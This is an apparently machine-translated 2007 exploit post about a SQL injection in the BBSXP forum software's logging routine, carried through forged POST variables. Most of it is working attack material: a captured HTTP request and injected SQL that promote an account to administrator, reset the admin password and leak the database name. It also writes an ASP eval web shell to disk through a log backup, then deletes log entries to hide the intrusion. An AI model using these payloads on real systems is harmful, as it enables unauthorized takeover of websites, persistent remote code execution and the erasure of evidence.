bbsxp sql latest version and then burst 0day?- Vulnerability warning-the black bar safety net

ID MYHACK58:62200715244
Type myhack58
Reporter 佚名
Modified 2007-04-27T00:00:00


bbsxp some time ago a log injection vulnerability, this vulnerability is still present in this place. sub Log(Message) if Request. ServerVariables("Query_String")<>"" then Query_String="?"& amp;Request. ServerVariables("Query_String")&"" Conn. Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('"&CookieUserName&"','"&Request. ServerVariables("REMOTE_ADDR")&"','"&amp; HTMLEncode(Request. Servervariables("HTTP_User_AGENT"))&"','"&Request. ServerVariables("request_method")&"','http://"&Request. ServerVariables("server_name")&""&Request. ServerVariables("script_name")&""&Query_String&"','"&amp; HTMLEncode(Request. ServerVariables("HTTP_REFERER"))&"','"&Err. Description&"','"&Request. Form&"','"&Message&"')") end sub The last vulnerability is appeared in the HTTP_REFERER, the latest version of the already used HTMLEncode treated. In fact, in this log()inside there's still we can control the variables,is Request. Form Registered users xason,made a paste and then edit. Capture as follows: POST sxp/editpost. asp? threadid=1&postid=1 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, / Referer: http://localhost/bbsxp/edi... Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; . NET CLR 1.1.4322) Host: localhost Content-Length: 5 3 Connection: Keep-Alive Cache-Control: no-cache Cookie: skins=1; Eremite=0; UserID=2; Userpass=1679707407E0FEDAA79EA80AB389A964; Onlinetime=2 0 0 7%2D3%2D10+2 1%3A30%3A37; ForumNameList=%3Coption%20value%3D%27ShowForum. asp%3FForumID%3D1%2 7%3E%u7F51%u7EDC%3C/option%3E; ASPSESSIONIDSQCDCSQA=NBOPHAJCAIEFFCMHGDFJNKBH; ASPSESSIONIDSCTRRACA=OCIBAKBAFDDDJAADKKJBPBNI


The variable Request. Form is content=test+log&UpFileID=&Category=&Subject=test+log The above variables are is the result of HTMLEncode process, but we can still think of a way to bypass go. We can fake variables,for example, we put content=test+log&UpFileID=&Category=&Subject=test+log changed to content=test+log&UpFileID=&Category=&Subject=test+log&xason=love Remember to modify the Content-Length,open bbsxp_log table saw POSTData: content=test+log&UpFileID=&Category=&Subject=test+log&xason=love Seen something? Hey, we forged a variable xason just like that into the database. Because it is a bogus variable, so nature is not subjected to any filtering. The following ideas will clear, the elevated privileges for administrators, and then into the backend to view the site of the road environment, and then use log backups to get webshell Elevated permissions: content=test+log&UpFileID=&Category=&Subject=test+log Changed to: content=test+log&UpFileID=&Category=&Subject=test+log&xason=love',");update bbsxp_users set userroleid=1 where username='xason'-- So it becomes a front Desk administrator.

To modify the background of the password: update bbsxp_sitesettings set adminpassword='md5 password'-- bbsxp through the md5 encryption of the password letters are all uppercase

Get the database name: update bbsxp_users set usermail=db_name() where username='xason'--

log backup to take the webshell: alter database bbsxp set recovery full;drop table cmd;create table cmd (a image);backup log bbsxp to disk = 'c:\cmd' with init;insert into cmd(a) values ('<%eval request(chr(3 5)):response. end%>');backup log bbsxp to disk = 'C:\web\bbsxp\cmd.asp';--

Modify the backend password to remember to change it back Oh, otherwise the administrator can't get into the background, so it is best to get to get the administrator password. Finally, remember to wipe PP,delete * from bbsxp_log where username='xason'--

ps:official forums I've tested without success, don't know what reason. However in local and online test success!